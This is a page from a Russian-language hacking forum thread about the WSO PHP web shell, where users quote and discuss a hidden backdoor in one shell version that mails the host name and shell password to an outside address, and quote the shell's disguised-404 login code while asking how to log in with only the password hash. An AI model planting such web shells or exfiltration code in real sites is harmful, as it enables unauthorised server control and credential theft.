HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ИНФО > Статьи > Избранное
Перезагрузить страницу WSO (веб-шелл)
   
Ответ
Страница 56 из 58 « Первая < 646 52 53 54 55 56 57 58 >
 
Опции темы Поиск в этой теме Опции просмотра

  #551  
Старый 28.05.2017, 12:48
ACat
Участник форума
Регистрация: 10.03.2017
Сообщений: 159
С нами: 4830806

Репутация: 0
По умолчанию
Цитата:
Сообщение от crlf  

В чистом WSO нет такого. Функция может делать что угодно, но точно ничего путного. Возможно ифреймер.
https://github.com/tennc/webshell/tree/master/php/wso
 
Ответить с цитированием

  #552  
Старый 22.12.2017, 05:50
shmell
Новичок
Регистрация: 01.03.2011
Сообщений: 2
С нами: 8000246

Репутация: 0
По умолчанию
Цитата:
Ну да, только стучалка там есть =(
 
Ответить с цитированием

  #553  
Старый 22.12.2017, 13:31
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию
Цитата:
Сообщение от shmell  

Ну да, только стучалка там есть =(
__tps://github.com/tennc/webshell/blob/master/php/wso/wso-4.2.5.php

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]array_key_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'watching'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"])){
[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'SERVER_NAME'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'PHP_SELF'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"\n"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pass'[/COLOR][COLOR="#007700"]]; @[/COLOR][COLOR="#0000BB"]mail[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'hard_linux@mail.ru'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'root'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]// Edit or delete!
[/COLOR][COLOR="#007700"]}
[/COLOR][/COLOR
Стучалку и вырезать можно!
 
Ответить с цитированием

  #554  
Старый 23.12.2017, 00:01
rdpstore555
Новичок
Регистрация: 16.12.2017
Сообщений: 7
С нами: 4426166

Репутация: 0
По умолчанию
thnks for this
 
Ответить с цитированием

  #555  
Старый 27.12.2017, 11:14
shmell
Новичок
Регистрация: 01.03.2011
Сообщений: 2
С нами: 8000246

Репутация: 0
По умолчанию
Цитата:
Сообщение от winstrool  

__tps://github.com/tennc/webshell/blob/master/php/wso/wso-4.2.5.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]array_key_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'watching'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"])){
[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'SERVER_NAME'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'PHP_SELF'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"\n"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pass'[/COLOR][COLOR="#007700"]]; @[/COLOR][COLOR="#0000BB"]mail[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'hard_linux@mail.ru'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'root'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]// Edit or delete!
[/COLOR][COLOR="#007700"]}
[/COLOR][/COLOR
Стучалку и вырезать можно!
Можно, только остается вопрос каких еще сурпрайзов ждать от этого WSO=((( А так красивый.
 
Ответить с цитированием

  #556  
Старый 22.02.2018, 18:03
SuNDowN
Участник форума
Регистрация: 31.03.2008
Сообщений: 160
С нами: 9533780

Репутация: 97
По умолчанию
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]. . .
@[/COLOR][COLOR="#0000BB"]session_start[/COLOR][COLOR="#007700"]();
@[/COLOR][COLOR="#0000BB"]ini_set[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'error_log'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]NULL[/COLOR][COLOR="#007700"]);
@[/COLOR][COLOR="#0000BB"]ini_set[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'log_errors'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
@[/COLOR][COLOR="#0000BB"]ini_set[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'max_execution_time'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
@[/COLOR][COLOR="#0000BB"]set_time_limit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
@[/COLOR][COLOR="#0000BB"]set_magic_quotes_runtime[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
@[/COLOR][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'WSO_VERSION'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'2.6'[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]get_magic_quotes_gpc[/COLOR][COLOR="#007700"]()) {
function[/COLOR][COLOR="#0000BB"]WSOstripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"]) {
return[/COLOR][COLOR="#0000BB"]is_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"]) ?[/COLOR][COLOR="#0000BB"]array_map[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'WSOstripslashes'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"]) :[/COLOR][COLOR="#0000BB"]stripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]WSOstripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"]);
}
function[/COLOR][COLOR="#0000BB"]wsoLogin[/COLOR][COLOR="#007700"]() {
die([/COLOR][COLOR="#DD0000"]"Not Found
The requested URL was not found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at Port 80

input { margin:0;background-color:#fff;border:1px solid #fff; }

"[/COLOR][COLOR="#007700"]);
}
if(!isset([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]])]))
if( empty([/COLOR][COLOR="#0000BB"]$auth_pass[/COLOR][COLOR="#007700"]) || ( isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pass'[/COLOR][COLOR="#007700"]]) && ([/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pass'[/COLOR][COLOR="#007700"]]) ==[/COLOR][COLOR="#0000BB"]$auth_pass[/COLOR][COLOR="#007700"]) ) )
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]])] =[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];
else
[/COLOR][COLOR="#0000BB"]wsoLogin[/COLOR][COLOR="#007700"]();
if([/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]PHP_OS[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"])) ==[/COLOR][COLOR="#DD0000"]"win"[/COLOR][COLOR="#007700"])
[/COLOR][COLOR="#0000BB"]$os[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'win'[/COLOR][COLOR="#007700"];
else
[/COLOR][COLOR="#0000BB"]$os[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'nix'[/COLOR][COLOR="#007700"]; . . .[/COLOR][/COLOR
А возможно ли как то авторизоваться при таком методе авторизации зная лишь md5 исходного пароля $auth_pass ??? Я так понял что нельзя, ну на всякий решил спросить, чем чёрт не шутит.
 
Ответить с цитированием

  #557  
Старый 31.03.2018, 20:15
Matrix001
Участник форума
Регистрация: 18.08.2016
Сообщений: 188
С нами: 5124566

Репутация: 3
По умолчанию
Цитата:
Сообщение от SuNDowN  

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]. . .
@[/COLOR][COLOR="#0000BB"]session_start[/COLOR][COLOR="#007700"]();
@[/COLOR][COLOR="#0000BB"]ini_set[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'error_log'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]NULL[/COLOR][COLOR="#007700"]);
@[/COLOR][COLOR="#0000BB"]ini_set[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'log_errors'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
@[/COLOR][COLOR="#0000BB"]ini_set[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'max_execution_time'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
@[/COLOR][COLOR="#0000BB"]set_time_limit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
@[/COLOR][COLOR="#0000BB"]set_magic_quotes_runtime[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
@[/COLOR][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'WSO_VERSION'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'2.6'[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]get_magic_quotes_gpc[/COLOR][COLOR="#007700"]()) {
function[/COLOR][COLOR="#0000BB"]WSOstripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"]) {
return[/COLOR][COLOR="#0000BB"]is_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"]) ?[/COLOR][COLOR="#0000BB"]array_map[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'WSOstripslashes'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"]) :[/COLOR][COLOR="#0000BB"]stripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]WSOstripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"]);
}
function[/COLOR][COLOR="#0000BB"]wsoLogin[/COLOR][COLOR="#007700"]() {
die([/COLOR][COLOR="#DD0000"]"Not Found
The requested URL was not found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at Port 80

input { margin:0;background-color:#fff;border:1px solid #fff; }

"[/COLOR][COLOR="#007700"]);
}
if(!isset([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]])]))
if( empty([/COLOR][COLOR="#0000BB"]$auth_pass[/COLOR][COLOR="#007700"]) || ( isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pass'[/COLOR][COLOR="#007700"]]) && ([/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pass'[/COLOR][COLOR="#007700"]]) ==[/COLOR][COLOR="#0000BB"]$auth_pass[/COLOR][COLOR="#007700"]) ) )
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]])] =[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];
else
[/COLOR][COLOR="#0000BB"]wsoLogin[/COLOR][COLOR="#007700"]();
if([/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]PHP_OS[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"])) ==[/COLOR][COLOR="#DD0000"]"win"[/COLOR][COLOR="#007700"])
[/COLOR][COLOR="#0000BB"]$os[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'win'[/COLOR][COLOR="#007700"];
else
[/COLOR][COLOR="#0000BB"]$os[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'nix'[/COLOR][COLOR="#007700"]; . . .[/COLOR][/COLOR
А возможно ли как то авторизоваться при таком методе авторизации зная лишь md5 исходного пароля
$auth_pass ???
Я так понял что нельзя, ну на всякий решил спросить, чем чёрт не шутит.
Возможно (скорее всего) ...
 
Ответить с цитированием

  #558  
Старый 22.04.2018, 23:23
MrSeo
Новичок
Регистрация: 21.04.2018
Сообщений: 6
С нами: 4244726

Репутация: 0
По умолчанию
так наивно впихнули стучалку )
 
Ответить с цитированием

  #559  
Старый 01.05.2018, 11:30
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
С нами: 11278406

Репутация: 818


По умолчанию
Классная стучалка, правда $_SERVER['SERVER_NAME'] может содержать не домен а мусор но то все фигня.
 
Ответить с цитированием

  #560  
Старый 04.12.2018, 15:41
dragondragon
Познающий
Регистрация: 08.05.2013
Сообщений: 73
С нами: 6849686

Репутация: 0
По умолчанию
Народ а почему в zip или tar не упаковываются файлы, ничего не происходит, архив не создаётся?
 
Ответить с цитированием
Ответ
Страница 56 из 58 « Первая < 646 52 53 54 55 56 57 58 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Веб 2.0 и Веб 3.0. Будущее Интернета. SK | Heaton Мировые новости. Обсуждения. 5 13.06.2007 02:07
Переделанный шелл! k1b0rg PHP 33 03.04.2007 08:29



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка

Загрузка чата...